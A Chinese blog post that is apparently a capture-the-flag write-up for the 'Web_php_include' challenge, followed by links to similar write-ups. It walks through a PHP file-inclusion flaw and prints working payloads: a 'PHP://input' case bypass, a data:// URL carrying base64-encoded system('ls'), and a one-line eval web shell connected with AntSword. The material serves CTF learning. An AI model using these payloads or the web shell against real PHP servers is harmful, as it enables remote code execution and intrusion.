攻防世界 Web_php_include wp

最新推荐文章于 2024-05-04 16:25:44 发布
最新推荐文章于 2024-05-04 16:25:44 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: ctf php 文章标签: php 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55029563/article/details/118990188
版权
php 同时被 2 个专栏收录
3 篇文章 0 订阅
订阅专栏
ctf
2 篇文章 0 订阅
订阅专栏 
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

首先看到一串PHP代码。
strstr函数:查找字符串首次出现的位置。返回字符串剩余部分
strstr($page, "php://")在page变量中查找php://
str_replace("php://", "", $page);如果在page变量中查到了,就把php://替换成空。

方法一:大小写绕过strstr

提示我们上传php://,strstr函数又对大小写敏感。
所以我们可以考虑使用大小写绕过方法,即PHP://input
php://input:是个可以访问请求的原始数据的只读流。
然后post可执行代码。
在这里插入图片描述
最后得到flag文件名,只要改执行代码就行
把ls 改为cat fl4gisisish3r3.php
最后检查页面源码看到flag
在这里插入图片描述

方法二:data://

我们可以不考虑循环,也就是我们page变量数据中没有php://,可以使用data://伪协议达到同样的效果。

使用方法:data://text/plain;base64,xxxx(base64编码后的数据)

只要把方法一中的可执行代码进行base64编码,GET请求一下,就可以得到目录。
http://111.200.241.244:55942/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpOyA/Pg==

得到flag的方法同样。

方法三:上传木马

在方法一和二的基础上,更改执行代码,上传一串木马。
<?php eval($_POST[a]); ?>
使用中国蚁剑连接。
在这里插入图片描述

在这里插入图片描述
连接成功!
在这里插入图片描述
得到flag

weixin_55029563
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询框里过滤了,在url框里没有) 在使用union select时发现过滤关键字 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200313161718411.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpd
WEBWeb_php_include(多解)
sleepywin的博客
07-16 1107
解题
攻防世界-Web进阶篇-008Web_php_include
gyy990526的博客
03-14 2164
解:打开靶机显示一段php代码,进行代码审计 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> strstr() 函数搜索字符串在另一字符串中的第一次出现。 注释:该函数对大小写敏感。如需进行不区分大小
php字符串函数学习之strstr()_.docx
10-09
php字符串函数学习之strstr()_.docx
php学习笔记之mb_strstr的基本使用
10-18
主要给大家介绍了关于php学习笔记之mb_strstr的基本使用,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧。
ROSE笔记-Web_php_include-WP
居上
11-04 70
Web_php_include-记录 strstr($code,"name");//查找字符串"name"在code中首次出现的位置,并返回"name",否则返回false(该函数区分大小写) str_replace(""name1","name2",$code);//查找code中字符串"name1",若找到则替换为"name2" 用dirseacher扫描目录 发现PHPmyadmin,进入登录界面。爆破得到用户名root,密码为空 进入数据库后台,执行sql语句写入一句话木马 select "&lt
Web_php_include 和supersqli攻防世界xctf web
weixin_45689999的博客
03-03 446
Web_php_include 代码 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page);//相当于过滤了php:// } include($page...
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界miss-01,杂项misc太湖杯
11-01
攻防世界miss_01,杂项misc太湖杯。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127630023
web_easy_
09-30
This set of skin is modified according to the customer's skin
CString-int-string-char.zip_strstr
09-24
strstr()的简单实现 strstr(s1,s2)是一个经常用的函数,他的作用就是在字符串s1中寻找字符串s2如果找到了就返回指针,否则返回NULL。
A GOOD idea wp.docx
04-06
攻防世界Misc高手进阶区,A_Good_IdeaT题目WP,详细解题步骤及所需工具。帮助新手找到解题思路
XCTF-攻防世界CTF平台-Web类——4、Web_php_includephpstrstr()函数绕过、数据流协议)
Onlyone_1314的博客
11-14 2872
目录标题一级目录方法一、文件包含:php伪协议绕过strstr()函数方法二、文件包含:GET方式提交命令方法三、data://伪协议方法四、一句话木马连接后台方法五、data://伪协议+一句话木马 一级目录 打开题目地址: 代码: <?php show_source(__FILE__); echo $_GET['hello']; //输出hello变量指向的内容 $page=$_GET['page']; //把page变量的值赋给$page while (strstr($page
攻防世界-Web_php_include详解
Mr_helloword的博客
08-11 8137
Web_php_include 源代码: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 分析: strstr(): 定义和用法: 搜索字符串在另一个字符串中是否存在,如果是,返回字符串及剩余部分,否则返回
BUUCTF——web题目练习
最新发布
2401_82760239的博客
05-04 353
什么也没有,网页源代码也没有什么信息,于是返回上一个界面,用bp抓包看看里面有没有什么信息。根据页面提示,应该是用菜刀工具进行连接,菜刀和蚁剑作用和功能都差不多,这里我用蚁剑进行连接。再次打开题目环境,删除后上传.phtml的一句话木马,上传成功,用蚁剑连接即可得到flag。查看页面源代码,发现里面有一个跳转页面的连接,点击进去,查看这个页面。然后也没有发现什么信息,源代码也没有什么信息,那就用bp抓包看看。没有什么有用的信息,看看源代码试试。
supervisor 简单理解
qq_42857358的博客
04-28 253
test.ini文件内容。
桌面运维岗面试三十问
一坨小橙子的博客
04-28 758
桌面运维岗面试问题及答案汇总
PHP算命源码_最新测算塔罗源码_可以运营
吉他程序员的博客
04-30 317
八字精批、事业财运、姓名分析、宝宝起名、公司测名、姓名配对、综合详批、姻缘测算、牛年感情、PC版测算、八字合婚、紫微斗数、鼠年运程、月老姻缘、许愿祈福、号码解析、塔罗运势、脱单占卜、感情继续、脱单占卜、塔罗爱情、心理有你、能否复合、暗恋对象、是否分手、爱着别人、大师服务(包含多项功能)共计30余项功能,全网功能全,完善的版本。
18、ESP32 ESP-NOW 点对点通信
weixin_51358957的博客
05-04 360
ESP32 对 ESP-NOW 的基本使用
攻防世界web_php_include
03-16
攻防世界中的 web_php_include 是一种漏洞,它指的是在 PHP 程序中使用 include 或 require 语句加载文件时可能存在的安全问题。这种漏洞可能导致远程代码执行攻击,允许攻击者在服务器上执行任意代码。为了防止这种...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值